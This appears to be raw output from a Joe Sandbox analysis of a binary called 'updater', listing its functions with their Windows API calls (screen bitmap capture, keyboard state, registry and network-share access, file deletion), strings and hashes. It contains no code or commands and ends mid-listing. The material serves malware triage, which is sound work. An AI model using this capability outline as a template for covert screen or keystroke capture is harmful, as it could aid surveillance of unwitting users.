GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C08C20
CopySid.ADVAPI32(00000000), ref: 00C08C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C08C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C08C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C08C92

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: eaf75f94a8755a8cc5cc1afd01b3540c1e1d794a467e45b6cc6b98da8c0967f0
Instruction ID: a967cbc511b7a99ff3937b3b931dc84bd5b17364a1abcbc00fc4248eb2760ec5
Opcode Fuzzy Hash: eaf75f94a8755a8cc5cc1afd01b3540c1e1d794a467e45b6cc6b98da8c0967f0
Instruction Fuzzy Hash: CD614975900209EFDF10DFA4DC49FAEBB79FF05300F148169EAA5A7290DB359A09CB60

Function 00C27A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C27A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C27A85
CreateCompatibleDC.GDI32(?), ref: 00C27A91
SelectObject.GDI32(00000000,?), ref: 00C27A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C27AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C27B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C27B52
SelectObject.GDI32(00000006,?), ref: 00C27B5A
DeleteObject.GDI32(?), ref: 00C27B63
DeleteDC.GDI32(00000006), ref: 00C27B6A
ReleaseDC.USER32(00000000,?), ref: 00C27B75

Strings

(, xrefs: 00C27AFA

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 30055e63d9afb18260518a6f946c5b16b69a1a57e06f8f5ae741f814b5442333
Instruction ID: 5c81ad29c2199ccf8f768fcb4c4bae7bcc1a1e542c42741f53ea7cadac3e6093
Opcode Fuzzy Hash: 30055e63d9afb18260518a6f946c5b16b69a1a57e06f8f5ae741f814b5442333
Instruction Fuzzy Hash: 81515775944219EFCB14CFA8DC84FAEBBB9FF49310F14851DFA5AA7210D731A9408BA0

Function 00C1A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C1A4D4

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00C1A4F6
__swprintf.LIBCMT ref: 00C1A54F
__swprintf.LIBCMT ref: 00C1A568
_wprintf.LIBCMT ref: 00C1A61E
_wprintf.LIBCMT ref: 00C1A63C

Strings

"%s" (%d) : ==> %s:, xrefs: 00C1A637
"%s" (%d) : ==> %s:%s%s, xrefs: 00C1A619
Line %d (File "%s"):, xrefs: 00C1A549, 00C1A562
Error: , xrefs: 00C1A5E6
^ ERROR, xrefs: 00C1A5C0

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 32268ac09898e65ee1374b14ef14388230bd11198dc9d55b0e0b45d99cc45e8a
Instruction ID: c6b3ab9637dab53ade574bfb3455cd169a497bd383c250b01543a53268341965
Opcode Fuzzy Hash: 32268ac09898e65ee1374b14ef14388230bd11198dc9d55b0e0b45d99cc45e8a
Instruction Fuzzy Hash: E151A071800109AACF14EBE4CD46FEEB7B9AF06340F1045A9F515B21A2EB316F99DB61

Function 00C19710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1951A: __time64.LIBCMT ref: 00C19524

Part of subcall function 00BC4A8C: _fseek.LIBCMT ref: 00BC4AA4

__wsplitpath.LIBCMT ref: 00C197EF

Part of subcall function 00BD431E: __wsplitpath_helper.LIBCMT ref: 00BD435E

_wcscpy.LIBCMT ref: 00C19802
_wcscat.LIBCMT ref: 00C19815
__wsplitpath.LIBCMT ref: 00C1983A
_wcscat.LIBCMT ref: 00C19850
_wcscat.LIBCMT ref: 00C19863

Part of subcall function 00C19560: _memmove.LIBCMT ref: 00C19599
Part of subcall function 00C19560: _memmove.LIBCMT ref: 00C195A8

_wcscmp.LIBCMT ref: 00C197AA

Part of subcall function 00C19CF1: _wcscmp.LIBCMT ref: 00C19DE1
Part of subcall function 00C19CF1: _wcscmp.LIBCMT ref: 00C19DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C19A0D
_wcsncpy.LIBCMT ref: 00C19A80
DeleteFileW.KERNEL32(?,?), ref: 00C19AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C19ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C19ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C19AEF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 6de3f5d0e9cdda40921d4c097177c53ff02baa8b318e80d878693e1e8df01903
Instruction ID: ed47e70556d4591185d4a7cbba77cc0e0aee993879fe3483f2731240d592e07b
Opcode Fuzzy Hash: 6de3f5d0e9cdda40921d4c097177c53ff02baa8b318e80d878693e1e8df01903
Instruction Fuzzy Hash: 8FC13BB1D00228AADF21DF95CC95EDEB7BDEF45310F0040AAF609E7251EB709A849F65

Function 00BC5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BC5BF1
GetMenuItemCount.USER32(00C77890), ref: 00C00E7B
GetMenuItemCount.USER32(00C77890), ref: 00C00F2B
GetCursorPos.USER32(?), ref: 00C00F6F
SetForegroundWindow.USER32(00000000), ref: 00C00F78
TrackPopupMenuEx.USER32(00C77890,00000000,?,00000000,00000000,00000000), ref: 00C00F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C00F97

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: c737cbe3400de488b91954fdb59c7cd85adfb3cca82586c419e71bbef5537d96
Instruction ID: 2b4b28ca93a33a4224000d3f38d32eae3d50fd12c3bc8ec4946454c7cd1d629a
Opcode Fuzzy Hash: c737cbe3400de488b91954fdb59c7cd85adfb3cca82586c419e71bbef5537d96
Instruction Fuzzy Hash: 4971F470644709BFEB308B54DC89FAABFA4FF05764F20421AF634A61D1C7B168A0DB94

Function 00C083FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

_memset.LIBCMT ref: 00C08489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C084BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C084DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C084F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C08520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C08548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C08553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C08558

Strings

SOFTWARE\Classes\, xrefs: 00C0842A
\IPC$, xrefs: 00C084A0
\CLSID, xrefs: 00C08440

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 7c6d43462d61b25ddb192701dbd9345620e5facfb5a8537e2668bf3030ce958c
Instruction ID: 270f9894713f00774038c2aac728bdc1e77e5a0b00d6133b5378e1d2b908b753
Opcode Fuzzy Hash: 7c6d43462d61b25ddb192701dbd9345620e5facfb5a8537e2668bf3030ce958c
Instruction Fuzzy Hash: 63410A76C1022DABCF11EBA4DC95EEEB7B8FF05340F004569E955B61A1EA309E05CB90

Function 00C3147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3040D,?,?), ref: 00C31491

Strings

HKEY_USERS, xrefs: 00C31592
HKEY_CLASSES_ROOT, xrefs: 00C31524
HKLM, xrefs: 00C3150F
HKEY_LOCAL_MACHINE, xrefs: 00C314FA
HKCC, xrefs: 00C3155F
HKCR, xrefs: 00C31539
HKU, xrefs: 00C315A3
HKEY_CURRENT_CONFIG, xrefs: 00C3154E
HKCU, xrefs: 00C31581
HKEY_CURRENT_USER, xrefs: 00C31570

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: a429e44cec030c907ccfbe559dc8db036a6cfc5977924a145c5434b328f899c6
Instruction ID: 25bc393c8e149df2833c86972e699131c3e1515c6b8568c1d793907bbc5e17bc
Opcode Fuzzy Hash: a429e44cec030c907ccfbe559dc8db036a6cfc5977924a145c5434b328f899c6
Instruction Fuzzy Hash: 73414D7052425A8FCF10EF54D891BEE3765AF62300F544466FCA25B252DB30EE19CB61

Function 00C15882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Part of subcall function 00BC153B: _memmove.LIBCMT ref: 00BC15C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C158EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C15901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C15912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C15924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C15935

Strings

close PlayMe, xrefs: 00C158FC, 00C15929
status PlayMe mode, xrefs: 00C158E6
alias PlayMe, xrefs: 00C158C4
play PlayMe wait, xrefs: 00C1591F
play PlayMe, xrefs: 00C15930
open , xrefs: 00C1589A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: ffd52b405eacd60a691645a45d6e2b98b8f7bdf673c805a11d02c748f8513cec
Instruction ID: 6cfd8a068a3a7a7cf991ff418fcf194a0e8acc82291c31efc5144f14069b74fe
Opcode Fuzzy Hash: ffd52b405eacd60a691645a45d6e2b98b8f7bdf673c805a11d02c748f8513cec
Instruction Fuzzy Hash: 1E11B631A40119F9D720A765CC8AEFF7BBCEBD3B50F4008797411E21E1EE605D85C5A1

Function 00C14C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C14C27
gethostname.WSOCK32(?,00000100), ref: 00C14C41
gethostbyname.WSOCK32(?), ref: 00C14C4E
_wcscpy.LIBCMT ref: 00C14C76
_memmove.LIBCMT ref: 00C14C89
inet_ntoa.WSOCK32(?), ref: 00C14C94
_strcat.LIBCMT ref: 00C14CA2
_wcscpy.LIBCMT ref: 00C14CB9
WSACleanup.WSOCK32 ref: 00C14CC7
_wcscpy.LIBCMT ref: 00C14CD5

Strings

0.0.0.0, xrefs: 00C14C70

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 7cd2046fed820f8809415dfca6f1a053f3081ae7002cf0f6499a533d296bef39
Instruction ID: 01c39eb4aa7af6e653c1452b4d3ea7b1290f6f0796d462d637719b9550430b0d
Opcode Fuzzy Hash: 7cd2046fed820f8809415dfca6f1a053f3081ae7002cf0f6499a533d296bef39
Instruction Fuzzy Hash: A6113631904108ABCB24BB649D4AFEEB7BCEF42710F1001B6F50496292FF709AC19AA0

Function 00C15530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C15535

Part of subcall function 00BD0859: timeGetTime.WINMM(?,00000002,00BBC22C), ref: 00BD085D

Sleep.KERNEL32(0000000A), ref: 00C15561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00C15585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C155A7
SetActiveWindow.USER32 ref: 00C155C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C155D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C155F3
Sleep.KERNEL32(000000FA), ref: 00C155FE
IsWindow.USER32 ref: 00C1560A
EndDialog.USER32(00000000), ref: 00C1561B

Strings

BUTTON, xrefs: 00C15599

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 615a5cf4142a848ba55acf52268d17e28ba3f154f255a342adce040806804772
Instruction ID: 047de8884a820969c491bc634e8a554b18e77f0e4d408c05779189a5039b56d5
Opcode Fuzzy Hash: 615a5cf4142a848ba55acf52268d17e28ba3f154f255a342adce040806804772
Instruction Fuzzy Hash: EE21A478684645EFF7805B60EC8DBAD3B6AFB86385F101028FA1981271EF714DD4AB61

Function 00C1DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

CoInitialize.OLE32(00000000), ref: 00C1DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C1DCC0
SHGetDesktopFolder.SHELL32(?), ref: 00C1DCD4
CoCreateInstance.OLE32(00C43D4C,00000000,00000001,00C6B86C,?), ref: 00C1DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C1DD8F
CoTaskMemFree.OLE32(?,?), ref: 00C1DDE7
_memset.LIBCMT ref: 00C1DE24
SHBrowseForFolderW.SHELL32(?), ref: 00C1DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C1DE83
CoTaskMemFree.OLE32(00000000), ref: 00C1DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C1DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00C1DEC3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 51b82eeeba2ab4d0c485bb3ef7183e6db2d60f33a715dcbd2e645a3a8c3c3abc
Instruction ID: 55b6cbc25dbd4680c2ee690afb7fcdbdcb90b159dcd01d843b29838df1458dcf
Opcode Fuzzy Hash: 51b82eeeba2ab4d0c485bb3ef7183e6db2d60f33a715dcbd2e645a3a8c3c3abc
Instruction Fuzzy Hash: 3AB10D75A00109AFDB14DF64C898EAEBBF9FF49304B108499F906EB251DB30EE41DB50

Function 00C1081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C10896
SetKeyboardState.USER32(?), ref: 00C10901
GetAsyncKeyState.USER32(000000A0), ref: 00C10921
GetKeyState.USER32(000000A0), ref: 00C10938
GetAsyncKeyState.USER32(000000A1), ref: 00C10967
GetKeyState.USER32(000000A1), ref: 00C10978
GetAsyncKeyState.USER32(00000011), ref: 00C109A4
GetKeyState.USER32(00000011), ref: 00C109B2
GetAsyncKeyState.USER32(00000012), ref: 00C109DB
GetKeyState.USER32(00000012), ref: 00C109E9
GetAsyncKeyState.USER32(0000005B), ref: 00C10A12
GetKeyState.USER32(0000005B), ref: 00C10A20

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cebc8135f8095e313484dd3d852963fe2676d2c403418a8fc325d25cfc008d81
Instruction ID: dd834035ef0abdead6bc8b98bc923d9836ae5b749d7634ebd2ec5d3a60fc05ec
Opcode Fuzzy Hash: cebc8135f8095e313484dd3d852963fe2676d2c403418a8fc325d25cfc008d81
Instruction Fuzzy Hash: BE51BA24A0878819FB35EBA044117EABFB49F03780F18859D99D2571C3DAE49BCCE791

Function 00C0CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C0CE1C
GetWindowRect.USER32(00000000,?), ref: 00C0CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C0CE8C
GetDlgItem.USER32(?,00000002), ref: 00C0CE97
GetWindowRect.USER32(00000000,?), ref: 00C0CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C0CEFD
GetDlgItem.USER32(?,000003E9), ref: 00C0CF0B
GetWindowRect.USER32(00000000,?), ref: 00C0CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C0CF5F
GetDlgItem.USER32(?,000003EA), ref: 00C0CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C0CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00C0CF97

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 98523620147f777f48bbaa334ee3574cf53b15cfbd74a9edc8c3ac866acf2074
Instruction ID: 7a45dc9467d7064e15a15a3d9c459bb0c7a715b6b23578c1a7f3710bc450b03b
Opcode Fuzzy Hash: 98523620147f777f48bbaa334ee3574cf53b15cfbd74a9edc8c3ac866acf2074
Instruction Fuzzy Hash: E7514375B40205AFDB14CFA8CD85BADBBB6FB88710F148229FA16D62D0D7709D00CB50

Function 00BB23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB2412,?,00000000,?,?,?,?,00BB1AA7,00000000,?), ref: 00BB1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BB24AF
KillTimer.USER32(00000024,?,?,?,?,00BB1AA7,00000000,?,?,00BB1EBE,?,?), ref: 00BB254A
DestroyAcceleratorTable.USER32(00000000), ref: 00BEBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB1AA7,00000000,?,?,00BB1EBE,?,?), ref: 00BEC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB1AA7,00000000,?,?,00BB1EBE,?,?), ref: 00BEC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB1AA7,00000000,?,?,00BB1EBE,?,?), ref: 00BEC04B
